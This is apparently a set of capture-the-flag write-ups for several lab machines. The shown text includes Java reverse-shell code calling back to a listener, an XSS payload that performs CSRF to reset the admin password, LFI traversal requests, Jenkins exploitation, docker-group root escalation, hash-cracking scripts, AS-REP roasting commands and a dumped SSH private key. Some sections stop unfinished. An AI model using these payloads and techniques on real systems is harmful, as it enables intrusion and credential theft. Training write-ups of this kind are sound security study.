## Proxenum
``CVE-2024-23897``
Leak credentials from ``/proc/self/environ``
`admin:JenkinsSecdojo2024@`
```python
String host="10.8.0.3";
int port=1337;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket
s=new Socket(host,port);InputStream
pi=p.getInputStream(),pe=p.getErrorStream(),
si=s.getInputStream();OutputStream
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(
pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();
Thread.sleep(50);try {p.exitValue();break;}catch (Exception e)
{}};p.destroy();s.close();
```
Pspy
```python
/bin/sh -c /bin/sh -c 'mysql -u jenkins -pjenkins123@'
/bin/bash /home/jenkins/.logs.sh
```
Switch to user ``jenkins`` and overwrite ``.logs.sh`` to payload
Cronjob runs as root running ``.logs.sh ``so profit!
## Firm
The web application has so many functions that can lead to rabbit whole
But the goal was obvious because first you couldn't access some functions unless you are
activated and you can't also access the bank statement
To activate your account you simply just fill the form thingy (modify profile)
Then after doing that you'd see we can't access the "bank statement" function because we are
not admin
So the goal is to escalate our privilege to that of admin
There's a contact us function which says the administrator would view our messages posted
This gives it out that it's an XSS challenge
After posting a message we can access the message via
http://10.8.0.2:3000/member/messages
I saw that the message body parameter was vulnerable to xss to i decided to work with that
The HttpOnly cookie attribute was set to false which means we can use the XSS to steal the admin cookie
Pretty nice!
To be honest I got stucked trying to steal the cookie for minutess? skill issue/?
I decided to leave that route and check out other functions
When you use the modify profile function you would see that it doesn't really require knowing
the previous password of the user
Here's a request made when using that
```python
POST /member/profileModify HTTP/1.1
Host: 10.8.0.2:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Origin: http://10.8.0.2:3000
Connection: close
Referer: http://10.8.0.2:3000/member/profileModify
Cookie: logged=482ed65abac4ba228cfa822f30974467
Upgrade-Insecure-Requests: 1
firstname=pwner&familyname=pwner&email=pwner%40pwner.com&address=localhost&new_login=admin&new_password=pwn123456
```
This means we can leverage this function to reset any user password so far we know the
cookie?
In our case we would like to reset the admin password but that requires knowing the cookie
which we don't
This doesn't stop us because we can leverage the XSS to another whole level and perform a
CSRF attack
Our goal would be to abuse the XSS to reset the admin user password via that function
provided by the web app
Here's my exploit script that achieves this
```python
<script>
var url = "/member/profileModify";
var data =
"firstname=pwner&familyname=pwner&email=pwner@pwner.com&address=localhost&ne
w_login=admin&new_password=admin"
fetch(url, {
method: "POST",
mode: "cors",
credentials: "include",
body: data
})
</script>
```
So we just need to set that as the message value and after the admin views it BOOM!!!, that
would reset his password
This is the http request sent:
```python
POST /member/contact HTTP/1.1
Host: 10.8.0.2:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 458
Origin: http://10.8.0.2:3000
Connection: close
Referer: http://10.8.0.2:3000/member/contact
Cookie: logged=9004afecb25e0e403092e3af1efd158b
Upgrade-Insecure-Requests: 1
subject=abcd&message=%3Cscript%3E%0Avar%20url%20%3D%20%22%2Fmember%2Fprofile
Modify%22%3B%0Avar%20data%20%3D%20%22firstname%3Dpwner%26familyname%3Dpwner%
26email%3Dpwner%40pwner.com%26address%3Dlocalhost%26new_login%3Dadmin%26new_
password%3Dadmin%22%0A%0Afetch%28url%2C%20%7B%0A%20%20%20%20method%3A%20%22P
OST%22%2C%0A%20%20%20%20mode%3A%20%22cors%22%2C%0A%20%20%20%20credentials%3A
%20%22include%22%2C%0A%20%20%20%20body%3A%20data%0A%7D%29%0A%3C%2Fscript%3E%
0A
```
Doing that, the admin password should be admin:admin
Now we can login!
The bank statement function basically allows us to download a bank statement
This is the request made
This is a Express web app btw
From the way the files are being downloaded this suggests trying LFI. Doing that worked and i was able to read the flag located at: /home/local.txt
```python
GET /member/download?file=../../../../../../../home/local.txt HTTP/1.1
Host: 10.8.0.2:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.8.0.2:3000/member/bankStatement
Cookie: logged=482ed65abac4ba228cfa822f30974467
Upgrade-Insecure-Requests: 1
```
## Injected
Nmap Scan
Going over to the web page shows this
Viewing page source gives this
```python!
<!--
*************************************************************************
In this part, some verifications are made to show the right menu of my
website depending on the permissions granted to each user.
('power' column in mysql db)
-admin
-Utilisateur
****************************************************************************
-->
```
The comment is talking about there being some checks which would make the right menu of the
website show depending on what permission the user has
And that permission is based on the power column in the mysql db
Interestingly enough they gave us a potential column name from the db
## Linux Dont
Host 1: PrisonBreak
Nmap Scan
Going over to port 8080 shows a Jenkins instance
I was able to log in using admin:admin
I was able to log in using admin:admin
We can easily get shell using Jenkins Script Console by doing to Manage Jenkins -> Script
Console
At this point I just got a reverse shell
```python!
String host = "10.8.0.4";
int port = 1337;
String cmd = "bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host,port);
InputStream pi = p.getInputStream(),pe=p.getErrorStream(), si =
s.getInputStream();
OutputStream po =
p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(
pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();
Thread.sleep(50);try {p.exitValue();break;}catch (Exception e)
{}};p.destroy();s.close();
```
Back on my netcat listener it connected
I stabilized the shell
At this point we need to privesc
To do that I uploaded linpeas to the machine in-order find for ways in which I can escalate my
privilege
Ok we can see that we are among the docker group
We can leverage that to mount the /root directory
Let's see the available images present
Ok bash image is present so let's run it
`docker run -it -v /:/mnt/root 39a95ac32011 chroot /mnt/root`
Cool we are root and that's all
Host 2: OpenBook
Nmap Scan
e
Ok we have NFS open on port 2049 we can list the mount present there
Cool now we have to mount it
```python!
mkdir mnt
sudo mount -t nfs 10.8.0.3:/home/jean mnt
```
In the user's ssh directory shows the authorized_keys which is empty
Now we should be able to login as jean
But first let's unmount the mount
Time to login to ssh
Cool it worked!
Checking sudo permission shows we can run all as root
## LightMeta
- Lightweight
Only ldap and ssh open here
Let us enumerate the ldap service running
First I need to get the naming contexts
`ldapsearch -H ldap://10.8.0.3 -x -s base namingcontexts`
Doing that returns
`namingContexts: dc=disclosed,dc=local`
Now let's request the data there
`ldapsearch -H ldap://10.8.0.3 -x -b "DC=disclosed,DC=local`
Reading through the data I saw some user credential
I first tried to brute force the admin SSHA1 hash using this script I wrote
And yeah I got how the hashing works by researching it
```python!
import hashlib
import base64
wordlist = "/usr/share/wordlists/rockyou.txt"
ldap_user_hash = b"{SSHA}1JXKPZ8EYgZYutHKZeIRF583ZGCVJ91s"
try:
with open(wordlist, encoding="latin-1") as file:
for line in file:
if line.isprintable:
password = line.strip()
print(f"Trying password: {password}")
b64decoded = base64.b64decode(ldap_user_hash)
salt = b64decoded[-4:] # because this is SSHA: the last 4
bytes is the salt!
salted = password.encode() + salt
hashed = hashlib.sha1(salted).digest()
ldap_hash = b"{SSHA}" + base64.b64encode(hashed + salt)
if ldap_hash == ldap_user_hash:
print(password)
break
except Exception as e:
print(e)
```
Reading through the data I saw some user credential
I first tried to brute force the admin SSHA1 hash using this script I wrote
And yeah I got how the hashing works by researching it
Doing that i wasn't able to brute force it
But luckily some other users password was in plaintext when decoded from base64
I saved them all in a file
I then tried to brute force ssh with it but it didn't work :(
Ldap has a base64 encoded md5 salted hash which was able to crack to trustno1 for user admmark
Login to host and exploit sudo privilege apt
- Meta
Here's the nmap scan for this host
We have a Basic HTTP Authentication on port 80
When we try to access it we'd see that
Because I don't know the password and I tried some weak credentials but none worked I
decided to brute force it using the users and password I got earlier on
Doing that worked
`- passwd.txt -s 80 -f 10.8.0.2 http-get /`
The credential is
`admjane:J@n3theStrong`
Using that we get a Metabase login form
Quick google search on if that software has a public vulnerability leads to CVE-2023-38646
Now this exploit seems worth trying but it requires the setup token
Luckily we can retrieve the token without being authenticated by accessing the
/api/session/properties endpoint
Doing a quick find query I saw that it didn't have any token in it
Oh what now?
Since no token I assumed that the exploit would still work
But if the exploit is making a request to the metabase service that wouldn't work because it
requires authorization to access it
So I modified the exploit to add the header:
`Authorization: Basic YWRtamFuZTpKQG4zdGhlU3Ryb25n`
Which would allow it access the metabase
But after trying to run the exploit it didn't work
Oh well what now?
I also tried modify the token by proxying the exploit request but that didn't still work
I left that and tried searching for other exploits
CVE-2021-41277 ended up working which is an LFI vuln
Using that I read the user metabase ssh private key and logged in to the box
The password for the user was metabase and funny enough i spent like 30 minutes before
realization
We can run sudo as root on ALL
## Elixir
Nmap Scan
From the ports open we can conclude this is an AD environment
First I checked SMB but saw i couldn't access the available shares
I went on checking if i could access rpc using null authentication
With this i decided to work with the web app since i can't really do much from here
Moving on, i saw this
When I scrolled down I got some users which could be potential valid users on the domain
```python!
- Boris Johnson
- Adam Creaw
- Emily Brown
```
Then in the "email us" field i got a mail
`Em.Br@secdojo.local`
Then in the "email us" field i got a mail
The format looks particularly interesting
I decided to check if it's a valid user using kerbrute
`kerbrute userenum -d secdojo.local --dc 10.8.0.2 users.txt`
With this I decided to make the other users in this format and i got this list
```python!
Em.Br
Ad.Cr
Bo.Jo
```
Checking if those users are valid on the domain shows that it is indeed valid
Now I decided to check if any of the user has kerberos pre-auth disabled (as-rep roasting)
`impacket-GetNPUsers secdojo.local/ -dc-ip 10.8.0.2 -usersfile users.txt`
Ok great we have a valid kerberos hash
```python!
$krb5asrep$23$Ad.Cr@SECDOJO.LOCAL:6d545119fabe05cb80a2c3c055011b25$f93fe80d4
db0bc48df904e69fad83646397c776c887f0420bb5eba315726b5d81364d9f06aa91c87016fc
e13ebc0309a26cc8fc540d78a3833cf2828c75bcb66e6f14c1fbb5bd5e2f97fd7314f8b07bd5
2d520734c66899104055ddcea74e8b208cc0b52e59f1581bb8fee6c1d4a5f626998064f6dd99
049ce7cea12c3094778b67e0ec0c6105926fb1a05987ab58816ce8a411c936d07fc66c2ef02e
a693ac9ec848da2712683c160a07d93a3318d86583671bf14af7296f44ff899760cca319b796
aa5816c125ea59e798d3f6146a4972502caec9b21ca095ebdd10a99d7a544e036edbb9c10765
9107f076ba2
```
From cracking the hash, we get the user credential
`Ad.Cr:RockYou!`
Checking if this user has access to smb shows this
We have access to smb but since we don't have write access over the Sec-IT share I decided
to move on
I got the list of users on the machine by using --rid-brute from nxc to perform as-rep roast
`nxc smb secdojo.local -u ad.cr -p 'RockYou!' --rid-brute | grep -i
sidtypeuser | awk -F'\' '{print $2}' | cut -d '(' -f1`
After performing as-rep roasting i saw no other user was a victim
So I decided to check if the user has access to winrm
Ok nice we have access to it, so i logged in
`evil-winrm -u Ad.Cr -p 'RockYou!' -i secdojo.local`
Well we need to escalate privilege to administrator
Checking my user info shows this
## Exposed
Nmap
From the nmap scan only two ports are open (SSH & MongoDB)
For nmap to have enumerated the MongoDB that means it allows default authentication
I connected to it using mongo
I checked the available database
I connected to it using mongo
I checked the available database
When I saw this I was immediately taken away by the admin database, so I skipped checking
the others and went to it (which made me waste about an hour)
I checked the list of tables present and got this
Then I finally dumped the system.users table
Ok weird it gives me a JSON like value
```python!
{
"_id" : "admin.mongo",
"userId" : "85cb23bd-6a09-4f5d-9377-ed8f001225f8",
"user" : "mongo",
"db" : "admin",
"credentials" : {
"SCRAM-SHA-1" :
{ "iterationCount" : 10000,
"salt" : "1WPvAjXCENvcyAU8oUFLSg==",
"storedKey" : "917r8X6JHtftNQwSdPpa2zOQ5ms=",
"serverKey" : "dRM8fmOwzLmwxXBOWGxGRQo7BWc="
},
"SCRAM-SHA-256" : {
"iterationCount" : 15000,
"salt" : "EvaBRerxcANQinVWsqYWfGt7b0vQ0koDjgQvmw==",
"storedKey" : "ZHVBEbtbHI2bnxIb2F+uo05TtgPobOWrKcZtws2MVu8=",
"serverKey" : "V62QjNMvV1aQjv1BMUCxAnNzYA/+Ux7SUtlU9LDSXn0="
}
},
"roles" : [ {
"role" : "root",
"db" : "admin"
} ] }
```
I researched about what SCRAM is then found out that it's an authentication mechanism used by
MongoDB
I had to google about how I can retrieve the password from that and found out from this Github
issue that we can convert this to a hashcat format
At first I wanted to use previous tools but I failed awfully in making it work
So I left that and decided to read through the issue
After reading it I understood how the encryption is implemented and how I can make it in a
format hashcat could understand
From there I developed this tool that helped me achieve that
```python!
from json import loads
from sys import argv
from base64 import b64encode
def main():
data = open(argv[1], 'r').read().replace("UUID(", "").replace("),", ",")
json_data = loads(data)
user = b64encode(json_data['user'].encode()).decode()
i = 0
credentials = json_data['credentials']['SCRAM-SHA-1']
iterations = credentials['iterationCount']
salt = credentials['salt']
serverKey = credentials['serverKey']
print("${0}$*{1}*{2}*{3}*{4}*{5}".format("mongodb-scram", i, user,
iterations, salt, serverKey))
i = 1
credentials = json_data['credentials']['SCRAM-SHA-256']
iterations = credentials['iterationCount']
salt = credentials['salt']
serverKey = credentials['serverKey']
print("${0}$*{1}*{2}*{3}*{4}*{5}".format("mongodb-scram", i, user,
iterations, salt, serverKey))
if __name__ == '__main__':
main()
```
Moving on I was able to convert that json file to a hashcat format
```python!
- $mongodb-
scram$*0*bW9uZ28=*10000*1WPvAjXCENvcyAU8oUFLSg==*dRM8fmOwzLmwxXBOWGxGRQo7BWc
=
- $mongodb-
scram$*1*bW9uZ28=*15000*EvaBRerxcANQinVWsqYWfGt7b0vQ0koDjgQvmw==*V62QjNMvV1a
Qjv1BMUCxAnNzYA/+Ux7SUtlU9LDSXn0=
```
Using hashcat I brute forced it but they both gave me the password as
Oh phew that's the default cred it's nothing new
I decided to go check the other database and I saw this
I decided to go check the other database and I saw this
Secrets looks interesting
Checking the tables present there shows this
And finally I dumped it
```python!
{ "_id" : "02", "username" : "dev02", "status" : "down", "secret" : "null",
"key" :
"LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBblYwQmtqMTB
NUFpxU1kvWmVpVEg4T1VpRHoxQ2FNaHdxT3cyTzZvRW56TFZ1TnA4CnlUd3F3NDgxV1RzWTF6M0N
pWVBlek1mS3VESzZjVVNFcFdoWitRTXU1ZU5tOWZUZHZheWwwZytpNmhhaG1yUDgKdGE3Wk1KaUp
LS01aamw1L2dFWGgxMW1PTWR1RjBhS3VEUmh1eGhrWGdiNnpvSC9IUjdUUW1COU92enpIb2pScQo
yS3R4dnViZWRBL0ZvcG1WQlNIYkREQStuVkpHSEZRam1ZM1RVWFljYXFBaWN1R2lZUFBrZWI5WmV
VTkNkRldQCmdkWTJKWW5qdlJieW84bVUvT0JheEMySitkRFNaWUlBRjlhVVp1by9BWE1qWEtyUHF
CQU9xZEV5VG1XV2dVNWUKZytUMGVuOHdWR3c5cW9KL1YzWXdweFE4NmU4NzJ4LzVBR1lLR1FJREF
RQUJBb0lCQVFDWmdKVTh5emVoWDI0VQo3ZjZOK0gwVlR0NW5rVEZMdDJLMlZSMGVIRjQvMFQzTUF
VMUNtNjkzYmlYek1nT3NTdkdPWlJXY0dyUno5QUFNCjUzS2hTMmFnMG1zWUV6aG5hb0kzT01mVVh
pNWtQTWxOZUk5bHh2YlVRYWRoL1orN1VoRDcxcTlUKzJjSzJZSHoKR2NiQXZYbXBRZWE5U0lJK2F
RYkN1dTNUeG81eFdsZ3FUbnNMYUdkUW9QYU1ZVEVrUFJCcWRkYW1HRFVyb3dLWAp6TUdFdm9RUmd
5a1pROS9TTG1mN0tEU2M4MW8xNjA1ZnY0dk00Tzl0ZDVxNEdOaWJ3bmdrYVl5Z0hSazNWUDJwCnA
vSHVJTTU2bGNUUnk5Z2s4WE9RN3FWajEwaHpoYjhwcm1BVVYwSjhsb0NFbWJZRldpZDZLUGVrL3U
xRThlRXcKZk1qcjlST1JBb0dCQU1qN25yL0ROelRBazJXekhod2s0bEFialhyemFuT3JqNTV2bnN
VdjJRRU8rdUMzWVJCMAp2dUZYN0N2SkRVRENWdUdTaDQ4VGovNmg1UVlDU0dRdElXWjU0bXprZSs
1MzVIcUIvSCs4T2R0WmxnWUpjaTZqCnZOaUo3QmovMmVEazIxZUpCbW9oL3YvQWJGaStHeXV3ck5
EdGN3SVRhbVl5KzY4YktnYkJ6TjFGQW9HQkFNaHcKb2x0aVF1L0pwWUdJdC9uYXdSajBIRG5FT2p
lRGNQYWpsYithVE5PakdZS21NU2FHKzQvWnQ0aU5YRkliNy9ZVQpVQ1BONXNRSFRFVm01RG5JZTh
HOVQxRy8vTnFHRVNYdVJWODFjMjlEdjVXQ1dMZXhCOGl1UVdneGF1dk00YVh3Ck9OT294SHpPY2J
vYkpyQlBzbjYxT3VlUDZyL3ErZnI3a0IyY0V2VEZBb0dBTzlqSlJicmdwb0d0b252NnZGQ3oKWHo
xRkhOWjgzV0s1eW1qY2MwVXpMaUNDemdWdER0Umt2bjlLNFNMbUltRjhNNEZKZ201RjA0SHJ5NlZ
FWHlnZApLUUdrVGQ2ZmxMdjR1ZzRZM1FSMGlmK2NMOElDVVNjS3BjUTBIS0diQkYvQmZNaGRzNTd
aNnRnbXF5bzR0d0xPCkF3eWgwWDFza25BZUI5OWozVTA2THEwQ2dZQlIzdmZpSGN1N2lBRHJYUDN
RdDVLaDc2dkx5S1FDNHRSMFdiTWoKOVJHbWJIdFNDeklPUzVwYlVwR04zRGUyYmlUZ3ZjRlNMcHN
3dk01aGxycG9BOFRSQ05OcVQrSW5IQlhMQ1gwYQplNG13Qzlzb1pYcDVaWDBKY212UzlFUjVGbEd
nNXZNL09UTXd5MTVXcHhweGI4dzN4eXpOUXRLZkc0cUtBdEVGCjF5ZERCUUtCZ1FDN2l4TElGRlE
vNm1NeUViQWxrMGRPeDBxUFVqMlRCZDBxSUhxL3J0bnVJRUVIREdyQkNQcHQKS1F6VzdaYUwwZkN
1elpxTitCa29CcTRvKzZCOGFkRkN3bkY4eTBhM3lYTURrYjh6aEE3OXFwd2U3aWxrUTFpTwpITE5
JUTA4YVc5L3doaTZ2VXMxKzhmQUFvNEg3S05QWkxmMnF2T2lWVFNzdVlEWVJqaDBYVUE9PQotLS0
tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=" }
```
Interesting! I immediately threw that base64 like value into cyberchef and voila it gave an ssh
private key
Since the user is dev02 why not try login to it?
Well that's what I did and it worked!
Then to perform privilege escalation I saw that we could run ALL as root
Easy win here :)
Sign in with Wallet
Connect another wallet